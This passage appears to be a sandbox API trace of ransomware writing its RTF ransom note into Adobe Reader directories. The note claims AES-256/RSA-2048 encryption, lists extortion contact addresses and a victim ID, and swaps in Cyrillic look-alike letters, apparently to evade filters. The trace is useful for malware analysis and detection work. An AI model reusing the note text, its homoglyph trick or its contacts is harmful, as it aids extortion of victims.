\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.899] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.900] CloseHandle (hObject=0x1e4) returned 1 [0064.900] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\bg85_info.rtf")) returned 0xffffffff [0064.900] GetLastError () returned 0x2 [0064.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.901] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 